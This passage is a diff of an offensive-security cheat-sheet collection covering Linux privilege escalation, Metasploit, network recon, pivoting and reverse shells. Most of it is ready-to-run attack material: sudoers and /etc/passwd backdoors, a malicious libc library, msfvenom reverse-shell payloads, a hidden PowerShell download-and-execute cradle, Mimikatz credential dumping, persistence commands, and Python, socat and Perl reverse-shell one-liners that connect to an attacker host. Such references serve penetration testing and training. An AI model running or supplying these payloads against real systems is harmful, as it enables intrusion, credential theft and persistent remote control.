 echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
 # use SUDO without password
 echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
 ```
 ## NFS Root Squashing
 When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
 ```powershell
 # create dir
 mkdir /tmp/nfsdir  
 # mount directory 
 mount -t nfs 10.10.10.10:/shared /tmp/nfsdir 
 cd /tmp/nfsdir
 # copy wanted shell 
 cp /bin/bash . 	
 # set suid permission
 chmod +s bash 	
 ```
 ## Shared Library
 ### ldconfig
 Identify shared libraries with `ldd`
 ```powershell
 $ ldd /opt/binary
    linux-vdso.so.1 (0x00007ffe961cd000)
    vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
    /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)        
 ```
 Create a library in `/tmp` and activate the path.
 ```powershell
 gcc –Wall –fPIC –shared –o vulnlib.so /tmp/vulnlib.c
 echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so
 /opt/binary
 ```
 ### RPATH
 ```powershell
 level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
 0x00000001 (NEEDED)                     Shared library: [libc.so.6]
 0x0000000f (RPATH)                      Library rpath: [/var/tmp/flag15]
 level15@nebula:/home/flag15$ ldd ./flag15 
 linux-gate.so.1 =>  (0x0068c000)
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
 /lib/ld-linux.so.2 (0x005bb000)
 ```
 By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable.
 ```powershell
 level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/
 level15@nebula:/home/flag15$ ldd ./flag15 
 linux-gate.so.1 =>  (0x005b0000)
 libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
 /lib/ld-linux.so.2 (0x00737000)
 ```
 Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
 ```powershell
 #include<stdlib.h>
 #define SHELL "/bin/sh"
 int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
 {
 char *file = SHELL;
 char *argv[] = {SHELL,0};
 setresuid(geteuid(),geteuid(), geteuid());
 execve(file,argv,0);
 }
 ```
 ## Groups
 ### Docker
 Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`.
 ```bash
 $> docker run -it --rm -v $PWD:/mnt bash
 $> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
 ```
 Almost similar but you will also see all processes running on the host and be connected to the same NICs.
 ```powershell
 docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
 ```
 Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
 ```powershell
 $ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
 latest: Pulling from chrisfosterelli/rootplease
 2de59b831a23: Pull complete 
 354c3661655e: Pull complete 
 91930878a2d7: Pull complete 
 a3ed95caeb02: Pull complete 
 489b110c54dc: Pull complete 
 Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0
 Status: Downloaded newer image for chrisfosterelli/rootplease:latest
 You should now have a root shell on the host OS
 Press Ctrl-D to exit the docker instance / shell
 sh-5.0# id
 uid=0(root) gid=0(root) groups=0(root)
 ```
 ### LXC/LXD
 The privesc requires to run a container with elevated privileges and mount the host filesystem inside.
 ```powershell
 ╭─swissky@lab ~  
 ╰─$ id
 uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel)
 ```
 Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem.
 ```powershell
 # build a simple alpine image
 git clone https://github.com/saghul/lxd-alpine-builder
 ./build-alpine -a i686
 # import the image
 lxc image import ./alpine.tar.gz --alias myimage
 # run the image
 lxc init myimage mycontainer -c security.privileged=true
 # mount the /root into the image
 lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
 # interact with the container
 lxc start mycontainer
 lxc exec mycontainer /bin/sh
 ```
 Alternatively https://github.com/initstring/lxd_root
 ## Kernel Exploits
 Precompiled exploits can be found inside these repositories, run them at your own risk !
 * [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits)
 * [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/)
 The following exploits are known to work well.
 ### CVE-2016-5195 (DirtyCow)
 Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
 ```powershell
 # make dirtycow stable
 echo 0 > /proc/sys/vm/dirty_writeback_centisecs
 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
 https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
 https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
 ```
 ### CVE-2010-3904 (RDS)
 Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
 ```powershell
 https://www.exploit-db.com/exploits/15285/
 ```
 ### CVE-2010-4258 (Full Nelson)
 Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
 ```powershell
 https://www.exploit-db.com/exploits/15704/
 ```
 ### CVE-2012-0056 (Mempodipper)
 Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
 ```powershell
 https://www.exploit-db.com/exploits/18411
 ```
 ## References
 - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
 - [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
 - [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)
 - [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
 - [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
 - [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)
 - [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/)
 - [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
 - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
 * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
--- a/Resources/Metasploit
+++ b/Resources/Metasploit
@@ -0,0 +1,222 @@
 # Metasploit
 ## Summary
 * [Installation](#installation)
 * [Sessions](#sessions)
 * [Background handler](#background-handler)
 * [Meterpreter - Basic](#meterpreter---basic)
    * [Generate a meterpreter](#generate-a-meterpreter)
    * [Meterpreter Webdelivery](#meterpreter-webdelivery)
    * [Get System](#get-system)
    * [Persistence Startup](#persistence-startup)
    * [Portforward](#portforward)
    * [Upload / Download](#upload---download)
    * [Execute from Memory](#execute-from-memory)
    * [Mimikatz](#mimikatz)
    * [Pass the Hash - PSExec](#pass-the-hash---psexec)
 * [Scripting Metasploit](#scripting-metasploit)
 * [Multiple transports](#multiple-transports)
 * [Best of - Exploits](#best-of---exploits)
 * [References](#references)
 ## Installation
 ```powershell
 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
 ```
 or docker
 ```powershell
 sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit
 ```
 ## Sessions
 ```powershell
 CTRL+Z   -> Session in Background
 sessions -> List sessions
 sessions -i session_number -> Interact with Session with id
 sessions -u session_number -> Upgrade session to a meterpreter
 sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false-> Upgrade session to a meterpreter
 sessions -c cmd           -> Execute a command on several sessions
 sessions -i 10-20 -c "id" -> Execute a command on several sessions
 ```
 ## Background handler
 ExitOnSession : the handler will not exit if the meterpreter dies.
 ```powershell
 screen -dRR
 sudo msfconsole
 use exploit/multi/handler
 set PAYLOAD generic/shell_reverse_tcp
 set LHOST 0.0.0.0
 set LPORT 4444
 set ExitOnSession false
 generate -o /tmp/meterpreter.exe -f exe
 to_handler
 [ctrl+a] + [d]
 ```
 ## Meterpreter - Basic
 ### Generate a meterpreter
 ```powershell
 $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
 $ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
 $ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
 $ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
 $ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
 $ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
 $ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
 $ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl
 ```
 ### Meterpreter Webdelivery
 Set up a Powershell web delivery listening on port 8080.
 ```powershell
 use exploit/multi/script/web_delivery
 set TARGET 2
 set payload windows/x64/meterpreter/reverse_http
 set LHOST 10.0.0.1
 set LPORT 4444
 run
 ```
 ```powershell
 powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB');
 ```
 ### Get System
 ```powershell
 meterpreter > getsystem
 ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 ```
 ### Persistence Startup
 ```powershell
 OPTIONS:
 -A        Automatically start a matching exploit/multi/handler to connect to the agent
 -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
 -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
 -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
 -T <opt>  Alternate executable template to use
 -U        Automatically start the agent when the User logs on
 -X        Automatically start the agent when the system boots
 -h        This help menu
 -i <opt>  The interval in seconds between each connection attempt
 -p <opt>  The port on which the system running Metasploit is listening
 -r <opt>  The IP of the system running Metasploit listening for the connect back
 meterpreter > run persistence -U -p 4242
 ```
 ### Portforward
 ```powershell
 portfwd add -l 7777 -r 172.17.0.2 -p 3006
 ```
 ### Upload / Download
 ```powershell
 upload /path/in/hdd/payload.exe exploit.exe
 download /path/in/victim
 ```
 ### Execute from Memory
 ```powershell
 execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w
 ```
 ### Mimikatz
 ```powershell
 load mimikatz
 mimikatz_command -f version
 mimikatz_command -f samdump::hashes
 mimikatz_command -f sekurlsa::wdigest
 mimikatz_command -f sekurlsa::searchPasswords
 mimikatz_command -f sekurlsa::logonPasswords full
 ```
 ```powershell
 load kiwi
 creds_all
 golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
 ```
 ### Pass the Hash - PSExec
 ```powershell
 msf > use exploit/windows/smb/psexec
 msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
 msf exploit(psexec) > exploit
 SMBDomain             WORKGROUP                                                          no        The Windows domain to use for authentication
 SMBPass               598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf  no        The password for the specified username
 SMBUser               Lambda                                                             no        The username to authenticate as
 ```
 ## Scripting Metasploit
 Using a `.rc file`, write the commands to execute, then run `msfconsole -r ./file.rc`.
 Here is a simple example to script the deployment of a handler an create an Office doc with macro.
 ```powershell
 use exploit/multi/handler
 set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
 set LPORT 4646
 set ExitOnSession false
 exploit -j -z
 use exploit/multi/fileformat/office_word_macro 
 set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 10.10.14.22
 set LPORT 4646
 exploit
 ```
 ## Multiple transports
 ```powershell
 msfvenom -p windows/meterpreter_reverse_tcp lhost=<host> lport=<port> sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe
 ```
 Then, in AddTransports.ps1
 ```powershell
 Add-TcpTransport -lhost <host> -lport <port> -RetryWait 10 -RetryTotal 30
 Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 30
 ```
 ## Best of - Exploits
 * MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`
 * MS08_67 - `exploit/windows/smb/ms08_067_netapi`
 ## References
 * [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/)
 * [Creating Metasploit Payloads - Peleus](https://netsec.ws/?p=331)
--- a/Resources/Methodology_and_enumeration.md
+++ b/Resources/Methodology_and_enumeration.md
@@ -8,6 +8,7 @@
  * The Harvester
 * [Active Recon](#active-recon)
  * Masscan
  * Nmap
  * Nmap Script
  * RPCClient
@@ -47,6 +48,13 @@
 ## Active recon
 * Masscan
 ```powershell
 masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
 masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
 ```
 * Basic NMAP
  ```bash
@@ -168,6 +176,18 @@
  index: 0x8 Account: root Name: root Desc: (null)
  ```  
 * Zone Transfer
  ```powershell
  host -t ns domain.local
  domain.local name server master.domain.local.
  host master.domain.local        
  master.domain.local has address 192.168.1.1
  dig axfr domain.local @192.168.1.1
  ```
 ## List all the subdirectories and files
 * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.
@@ -268,7 +288,7 @@ International test card numbers and tokens
 | 4000002460000001 | tok_fi         | Finland (FI)   | Visa           |
 | 4000002500000003 | tok_fr         | France (FR)    | Visa           |
-## Thanks to
+## References
 * [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/)
 * [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)
--- a/Resources/Network
+++ b/Resources/Network
@@ -1,38 +1,14 @@
 # Network Discovery
-## Netdiscover
+## Summary
-```powershell
+- [Nmap](#nmap)
-netdiscover -i eth0 -r 192.168.1.0/24
+- [Masscan](#masscan)
-Currently scanning: Finished!   |   Screen View: Unique Hosts
+- [Netdiscover](#netdiscover)
-
+- [Responder](#responder)
-20 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 876
+- [Bettercap](#bettercap)
-_____________________________________________________________________________
+- [Reconnoitre](#reconnoitre)
-IP            At MAC Address     Count     Len  MAC Vendor / Hostname
+- [References](#references)
 -----------------------------------------------------------------------------
 192.168.1.AA    68:AA:AA:AA:AA:AA     15     630  Sagemcom
 192.168.1.XX    52:XX:XX:XX:XX:XX      1      60  Unknown vendor
 192.168.1.YY    24:YY:YY:YY:YY:YY      1      60  QNAP Systems, Inc.
 192.168.1.ZZ    b8:ZZ:ZZ:ZZ:ZZ:ZZ      3     126  HUAWEI TECHNOLOGIES CO.,LTD  
 ```
 ## Responder
 ```powershell
 responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
 responder.py -I eth0 -wrf
 ```
 Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
 ## Bettercap
 ```powershell
 bettercap -X --proxy --proxy-https -T <target IP>
 # better cap in spoofing, discovery, sniffer
 # intercepting http and https requests,
 # targetting specific IP only
 ```
 ## Nmap
@@ -40,6 +16,8 @@ bettercap -X --proxy --proxy-https -T <target IP>
 ```powershell
 nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
 -sn : Disable port scanning. Host discovery only.
 -n : Never do DNS resolution
 ```
 * Basic NMAP
@@ -119,6 +97,16 @@ Host script results:
 List Nmap scripts : ls /usr/share/nmap/scripts/
 ```
 ## Masscan
 ```powershell
 masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
 masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
 masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
 masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
 ```
 ## Reconnoitre
 Dependencies:
@@ -133,6 +121,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
 If you have a segfault with nbtscan, read the following quote.
 > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
-## Thanks
+## Netdiscover
 ```powershell
 netdiscover -i eth0 -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 20 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 876
 _____________________________________________________________________________
 IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.AA    68:AA:AA:AA:AA:AA     15     630  Sagemcom
 192.168.1.XX    52:XX:XX:XX:XX:XX      1      60  Unknown vendor
 192.168.1.YY    24:YY:YY:YY:YY:YY      1      60  QNAP Systems, Inc.
 192.168.1.ZZ    b8:ZZ:ZZ:ZZ:ZZ:ZZ      3     126  HUAWEI TECHNOLOGIES CO.,LTD  
 ```
 ## Responder
 ```powershell
 responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
 responder.py -I eth0 -wrf
 ```
 Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
 ## Bettercap
 ```powershell
 bettercap -X --proxy --proxy-https -T <target IP>
 # better cap in spoofing, discovery, sniffer
 # intercepting http and https requests,
 # targetting specific IP only
 ```
 ## References
 * [TODO](TODO)
--- a/Resources/Network
+++ b/Resources/Network
@@ -1,5 +1,26 @@
 # Network Pivoting Techniques
 ## Summary
 * [Windows netsh Port Forwarding](#windows-netsh-port-forwarding)
 * [SSH](#ssh)
  * [SOCKS Proxy](#socks-proxy)
  * [Local Port Forwarding](#local-port-forwarding)
  * [Remote Port Forwarding](#remote-port-forwarding)
 * [Proxychains](#proxychains)
 * [Web SOCKS - reGeorg](#web-socks---regeorg)
 * [Metasploit](#metasploit)
 * [sshuttle](#sshuttle)
 * [chisel](#chisel)
 * [Rpivot](#rpivot)
 * [plink](#plink)
 * [ngrok](#ngrok)
 * [Basic Pivoting Types](#basic-pivoting-types)
  * [Listen - Listen](#listen---listen)
  * [Listen - Connect](#listen---connect)
  * [Connect - Connect](#connect---connect)
 * [References](#references)
 ## Windows netsh Port Forwarding
 ```powershell
@@ -42,6 +63,7 @@ ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
 ```bash
 ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
 ssh -R 3389:10.1.1.224:3389 root@10.11.0.32
 ```
 ## Proxychains
@@ -59,8 +81,86 @@ Set the SOCKS4 proxy then `proxychains nmap -sT 192.168.5.6`
 [reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
 Drop one of the following files on the server:
 - tunnel.ashx
 - tunnel.aspx
 - tunnel.js
 - tunnel.jsp
 - tunnel.nosocket.php
 - tunnel.php
 - tunnel.tomcat.5.jsp
 ```python
-python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
+python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080
 optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]
 ```
 ## Metasploit
 ```powershell
 # Meterpreter list active port forwards
 portfwd list 
 # Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
 portfwd add –l 3389 –p 3389 –r target-host 
 portfwd add -l 88 -p 88 -r 127.0.0.1
 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
 # Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
 portfwd delete –l 3389 –p 3389 –r target-host 
 # Meterpreter delete all port forwards
 portfwd flush 
 or
 # Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
 run autoroute -s 192.168.15.0/24 
 use auxiliary/server/socks4a
 # Meterpreter list all active routes
 run autoroute -p 
 route #Meterpreter view available networks the compromised host can access
 # Meterpreter add route for 192.168.14.0/24 via Session number.
 route add 192.168.14.0 255.255.255.0 3 
 # Meterpreter delete route for 192.168.14.0/24 via Session number.
 route delete 192.168.14.0 255.255.255.0 3 
 # Meterpreter delete all routes
 route flush 
 ```
 ## sshuttle
 Transparent proxy server that works as a poor man's VPN. Forwards over ssh. 
 * Doesn't require admin. 
 * Works with Linux and MacOS.
 * Supports DNS tunneling.
 ```powershell
 pacman -Sy sshuttle
 apt-get install sshuttle
 sshuttle -vvr user@10.10.10.10 10.1.1.0/24
 sshuttle -vvr username@pivot_host 10.2.2.0/24 
 ```
 ## chisel
 ```powershell
 go get -v github.com/jpillora/chisel
 # forward port 389 and 88 to hacker computer
 user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 
 user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
 ```
 ## Rpivot
@@ -97,9 +197,26 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
 ```powershell
 plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389    --> exposes the RDP port of the machine in the port 3390 of the SSH Server
 plink -l root -pw mypassword 192.168.18.84 -R
 plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445
 plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
 ```
 ## ngrok
 ```powershell
 # get the binary
 wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
 unzip ngrok-stable-linux-amd64.zip 
 # log into the service
 ./ngrok authtoken 3U[REDACTED_TOKEN]Hm
 # deploy a port forwarding for 4433
 ./ngrok http 4433
 ./ngrok tcp 4433
 ```
 ## Basic Pivoting Types
 | Type              | Use Case                                    |
@@ -108,7 +225,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
 | Listen - Connect  | Normal redirect.                            |
 | Connect - Connect | Can’t bind, so connect to bridge two hosts  |
-## Listen - Listen
+### Listen - Listen
 | Type              | Use Case                                    |
 | :-------------    | :------------------------------------------ |
@@ -117,7 +234,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
 | remote host 1     | `ncat localhost 8080 < file`                |
 | remote host 2     | `ncat localhost 9090 > newfile`             |
-## Listen - Connect
+### Listen - Connect
 | Type              | Use Case                                                        |
 | :-------------    | :------------------------------------------                     |
@@ -126,7 +243,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
 | remote host 1     | `ncat localhost -p 8080 < file`                                 |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                     |
-## Connect - Connect
+### Connect - Connect
 | Type              | Use Case                                                                   |
 | :-------------    | :------------------------------------------                                |
@@ -135,9 +252,10 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
 | remote host 1     | `ncat -l -p 8080 < file                                                    |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                                |
-## Thanks to
+## References
 * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
 * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
 * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
 * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
 * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
--- a/Resources/Reverse
+++ b/Resources/Reverse
@@ -1,6 +1,37 @@
-# Reverse Shell Methods
+# Reverse Shell Cheat Sheet
-## Reverse Shell Cheat Sheet
+## Summary
 * [Reverse Shell](#reverse-shell)
    * [Bash TCP](#bash-tcp)
    * [Bash UDP](#bash-udp)
    * [Socat](#socat)
    * [Perl](#perl)
    * [Python](#python)
    * [PHP](#php)
    * [Ruby](#ruby)
    * [Golang](#golang)
    * [Netcat Traditional](#netcat-traditional)
    * [Netcat OpenBsd](#netcat-openbsd)
    * [Ncat](#ncat)
    * [OpenSSL](#openssl)
    * [Powershell](#powershell)
    * [Awk](#awk)
    * [Java](#java)
    * [War](#war)
    * [Lua](#lua)
    * [NodeJS](#nodejs)
    * [Groovy](#groovy)
 * [Meterpreter Shell](#meterpreter-shell)
    * [Windows Staged reverse TCP](#windows-staged-reverse-tcp)
    * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp)
    * [Linux Staged reverse TCP](#linux-staged-reverse-tcp)
    * [Linux Stageless reverse TCP](#linux-stageless-reverse-tcp)
    * [Other platforms](#other-platforms)
 * [Spawn TTY Shell](#spawn-tty-shell)
 * [References](#references)
 ## Reverse Shell
 ### Bash TCP
@@ -20,6 +51,15 @@ Listener:
 nc -u -lvp 4242
 ```
 ### Socat
 ```powershell
 user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4242
 ```
 Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)
 ### Perl
 ```perl
@@ -36,8 +76,19 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen(
 Linux only
 IPv4
 ```python
-python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
+export RHOST="10.10.10.10";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
 ```
 IPv4
 ```python
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
 ```
 IPv6
 ```python
 python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 
 ```
 ```python
@@ -47,7 +98,7 @@ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC
 Windows only
 ```powershell
